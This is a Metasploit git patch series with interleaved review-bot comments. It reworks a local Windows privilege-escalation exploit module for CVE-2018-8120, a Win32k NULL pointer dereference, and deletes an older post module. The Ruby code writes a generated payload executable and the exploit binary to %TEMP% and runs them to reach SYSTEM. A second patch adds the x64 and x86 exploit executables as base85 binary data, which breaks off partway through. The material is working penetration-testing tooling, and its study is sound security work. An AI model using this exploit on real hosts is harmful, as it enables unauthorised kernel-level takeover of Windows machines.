Sep 17 00:00:00 2001 From: Shelby Pace Date: Wed, 10 Oct 2018 14:41:14 -0500 Subject: [PATCH 29/39] changed formatting, deleted post, renamed files --- ...privsec.md => ms18_8120_win32k_privesc.md} | 0 ...privsec.rb => ms18_8120_win32k_privesc.rb} | 92 ++++++++++--------- .../escalate/ms18_8120_win32k_privsec.rb | 91 ------------------ 3 files changed, 47 insertions(+), 136 deletions(-) rename documentation/modules/exploit/windows/local/{ms18_8120_win32k_privsec.md => ms18_8120_win32k_privesc.md} (100%) rename modules/exploits/windows/local/{ms18_8120_win32k_privsec.rb => ms18_8120_win32k_privesc.rb} (58%) delete mode 100644 modules/post/windows/escalate/ms18_8120_win32k_privsec.rb 
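Review bot: `validate_target` is defined on the new side of this hunk but nothing calls it, so `exploit` goes straight to writing two executables under %TEMP% and launching the Win32k binary without the already-SYSTEM, x86 and Windows XP checks ever running. For a kernel NULL-pointer-dereference exploit this matters to the host under test, since a run against a build the binary was not written for may end in a bugcheck rather than a clean `fail_with`. I would make `validate_target` the first statement of `exploit`, or move the checks into a `check` method so suitability is reported before anything touches disk. The same gap is still present in the `@@ -57,64 +57,66 @@` hunk of PATCH 29/39; the enclosing class starts outside this hunk.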
diff --git a/documentation/modules/exploit/windows/local/ms18_8120_win32k_privsec.md b/documentation/modules/exploit/windows/local/ms18_8120_win32k_privesc.md similarity index 100% rename from documentation/modules/exploit/windows/local/ms18_8120_win32k_privsec.md rename to documentation/modules/exploit/windows/local/ms18_8120_win32k_privesc.md diff --git a/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb b/modules/exploits/windows/local/ms18_8120_win32k_privesc.rb similarity index 58% rename from modules/exploits/windows/local/ms18_8120_win32k_privsec.rb rename to modules/exploits/windows/local/ms18_8120_win32k_privesc.rb index 19cbfd96cf..f80b35391d 100644 --- a/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb +++ b/modules/exploits/windows/local/ms18_8120_win32k_privesc.rb @@ -15,13 +15,13 @@ class MetasploitModule < Msf::Exploit::Local super(update_info(info, 'Name' => 'Windows SetImeInfoEx Win32k NULL Pointer Dereference', 'Description' => %q{ - This module exploits elevation of privilege vulnerability exists in Windows 7 and 2008 R2 + This module exploits elevation of privilege vulnerability that exists in Windows 7 and 2008 R2 when the Win32k component fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. - This module is tested against windows 7 x64 and windows server 2008 R2 standard x64. + This module has been tested against windows 7 x64 and windows server 2008 R2 standard x64. }, 'License' => MSF_LICENSE, 'Author' => [ 
@@ -57,64 +57,66 @@ class MetasploitModule < Msf::Exploit::Local )) end -def validate_target - if is_system? - fail_with(Failure::None, 'Session is already elevated') + def validate_target + if is_system? + fail_with(Failure::None, 'Session is already elevated') + end + + if sysinfo['Architecture'] == ARCH_X86 + fail_with(Failure::NoTarget, 'Exploit code is 64-bit only') + end + + if sysinfo['OS'] =~ /XP/ + fail_with(Failure::Unknown, 'The exploit binary does not support Windows XP') + end end - if sysinfo['Architecture'] == ARCH_X86 - fail_with(Failure::NoTarget, 'Exploit code is 64-bit only') + def write_exe_to_target(rexe, rexename) + begin + vprint_warning("Writing file to %TEMP%") + print_good("Exploiting SetImeInfoEx Win32k NULL Pointer Dereference") + temprexe = "#{session.fs.file.expand_path("%TEMP%")}\\#{rexename}" + write_file_to_target(temprexe,rexe) + rescue + fail_with(Failure::Unknown, "Writing #{temprexe} to disk was unsuccessful") + end + + vprint_good("File path: #{temprexe}") + temprexe end - if sysinfo['OS'] =~ /XP/ - fail_with(Failure::Unknown, 'The exploit binary does not support Windows XP') + def write_file_to_target(temprexe, rexe) + fd = session.fs.file.new(temprexe, "wb") + fd.write(rexe) + fd.close end -end -def write_exe_to_target(rexe, rexename) -begin -vprint_warning("Writing file to %TEMP%") - print_good("Exploiting SetImeInfoEx Win32k NULL Pointer Dereference") - temprexe = session.fs.file.expand_path("%TEMP%") + "\\" + rexename -write_file_to_target(temprexe,rexe) -end -vprint_good("File path: #{temprexe}") -temprexe -end + def create_payload_from_file(exec) + vprint_status("Reading payload from file #{exec}") + File.read(exec) + end -def write_file_to_target(temprexe,rexe) - fd = session.fs.file.new(temprexe, "wb") - fd.write(rexe) - fd.close -end - -def create_payload_from_file(exec) - vprint_status("Reading payload from file #{exec}") - ::IO.read(exec) -end - -def exploit - @payload_name = datastore['PAYLOAD'] - rexename = 
"#{Rex::Text.rand_text_alphanumeric(10)}.exe" - vprint_status("EXE's name is: #{rexename}") - exe = generate_payload_exe - tempdir = session.sys.config.getenv('TEMP') - tempexename = Rex::Text.rand_text_alpha(rand(8)+6) + def exploit + @payload_name = datastore['PAYLOAD'] + rexename = "#{Rex::Text.rand_text_alphanumeric(10)}.exe" + vprint_status("EXE's name is: #{rexename}") + exe = generate_payload_exe + tempdir = session.sys.config.getenv('TEMP') + tempexename = Rex::Text.rand_text_alpha(rand(8)+6) cmd = "#{tempdir}\\#{tempexename}.exe" vprint_status("Preparing payload at #{cmd}") write_file(cmd, exe) vprint_status("Payload uploaded to temp folder") - rexe = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-8120', 'CVE-2018-8120.exe') + rexe = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-8120', 'CVE-2018-8120.exe') raw = create_payload_from_file(rexe) script_on_target = write_exe_to_target(raw, rexename) command = "#{session.fs.file.expand_path("%TEMP%")}\\#{rexename}" vprint_status("Location of CVE-2018-8120.exe is: #{command}") - command += " " - command += "#{cmd}" - vprint_status("Executing command : #{command}") - pid = cmd_exec_get_pid(command) - print_good('Exploit finished, wait for privileged payload execution to complete.') + command << " #{cmd}" + vprint_status("Executing command : #{command}") + cmd_exec_get_pid(command) + print_good('Exploit finished, wait for privileged payload execution to complete.') + end end - end diff --git a/modules/post/windows/escalate/ms18_8120_win32k_privsec.rb b/modules/post/windows/escalate/ms18_8120_win32k_privsec.rb deleted file mode 100644 index 82066052a9..0000000000 --- a/modules/post/windows/escalate/ms18_8120_win32k_privsec.rb +++ /dev/null 
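Review bot: The bare `rescue` added to `write_exe_to_target` throws away the underlying exception, and if `expand_path` is the call that raised, `temprexe` is still nil, so the `fail_with` text names no path at all. Binding the error keeps the cause visible to the operator: `rescue => e` followed by `fail_with(Failure::Unknown, "Writing #{rexename} to %TEMP% failed: #{e.message}")`. Separately, `create_payload_from_file` now reads the bundled executable with `File.read`, which is a text-mode read; `::File.binread(exec)` returns the bytes untouched on any host platform and keeps the leading `::` that the removed `::IO.read` line had.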
@@ -1,91 +0,0 @@
-##
-# This module requires Metasploit: https://metasploit.com/download
-# Current source: https://github.com/rapid7/metasploit-framework
-##
-
-class MetasploitModule < Msf::Post
- Rank = GoodRanking
-
- include Msf::Post::File
- include Msf::Post::Windows::Registry
-
- def initialize(info = {})
- super(update_info(info,
- 'Name' => 'Windows SetImeInfoEx Win32k NULL Pointer Dereference',
- 'Description' => %q{
- This module exploits elevation of privilege vulnerability exists in Windows 7 and 2008 R2
- when the Win32k component fails to properly handle objects in memory. An attacker who
- successfully exploited this vulnerability could run arbitrary code in kernel mode. An
- attacker could then install programs; view, change, or delete data; or create new
- accounts with full user rights.},
- 'References' =>
- [
- ['BID', '104034'],
- ['CVE', '2018-8120'],
- ['URL', 'https://github.com/bigric3/cve-2018-8120'],
- ['URL', 'https://github.com/unamer/CVE-2018-8120'],
- ['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8120'],
- ['URL', 'http://bigric3.blogspot.com/2018/05/cve-2018-8120-analysis-and-exploit.html']
- ],
- 'Author' =>
- [
- 'unamer', # Exploit PoC
- 'bigric3', # Analysis and exploit
- 'Anton Cherepanov', # Vulnerability discovery
- 'Dhiraj Mishra ' # Metasploit module
- ],
- 'DisclosureDate' => 'May 9 2018',
- 'Arch' => [ARCH_X64, ARCH_X86],
- 'SessionTypes' => ['meterpreter'],
- 'License' => MSF_LICENSE
- ))
-
- register_options(
- [
- OptString.new('POCCMD', [true, 'The command to run from CVE-2018-8120.exe']),
- ])
- end
-
- def write_exe_to_target(rexe, rexename)
- begin
- print_status("Writing file to temp")
- temprexe = session.fs.file.expand_path("%TEMP%") + "\\" + rexename
- write_file_to_target(temprexe,rexe)
- end
- print_good("File path on remote system: #{temprexe}")
- temprexe
- end
-
- def write_file_to_target(temprexe,rexe)
- fd = session.fs.file.new(temprexe, "wb")
- fd.write(rexe)
- fd.close
- end
-
- def create_payload_from_file(exec)
- print_status("Reading file from: #{exec}")
- ::IO.read(exec)
- end
-
- def run
- rexename = Rex::Text.rand_text_alphanumeric(10) + ".exe"
- print_good("EXE name is: #{rexename}")
- poccmd = datastore['POCCMD']
-
- rexe = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-0824', 'CVE-2018-8120.exe')
- raw = create_payload_from_file rexe
- script_on_target = write_exe_to_target(raw, rexename)
-
- print_good('Initiating module...')
- print_line
-
- command = session.fs.file.expand_path("%TEMP%") + "\\" + rexename
- print_good("Location of CVE-2018-8120.exe is: #{command}")
- command += " "
- command += "\"#{poccmd}\""
- print_good("Executing command: #{command}")
- command_output = cmd_exec(command)
- print_line(command_output)
- print_line
- end
-end
From 521b50af559bc14af02149c539f47d93215d6f96 Mon Sep 17 00:00:00 2001 From: Shelby Pace Date: Thu, 11 Oct 2018 10:43:35 -0500 Subject: [PATCH 30/39] added separate binaries, extended for x86 --- .../CVE-2018-8120/CVE-2018-8120x64.exe | Bin 0 -> 95744 bytes .../CVE-2018-8120/CVE-2018-8120x86.exe | Bin 0 -> 83456 bytes .../windows/local/ms18_8120_win32k_privesc.rb | 36 +++++++++++------- 3 files changed, 22 insertions(+), 14 deletions(-) create mode 100755 data/exploits/CVE-2018-8120/CVE-2018-8120x64.exe create mode 100755 data/exploits/CVE-2018-8120/CVE-2018-8120x86.exe
diff --git a/data/exploits/CVE-2018-8120/CVE-2018-8120x64.exe b/data/exploits/CVE-2018-8120/CVE-2018-8120x64.exe new file mode 100755 index 0000000000000000000000000000000000000000..c18118b2ba3afee8de66940a624692c66554bdf0 GIT binary patch literal 95744 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 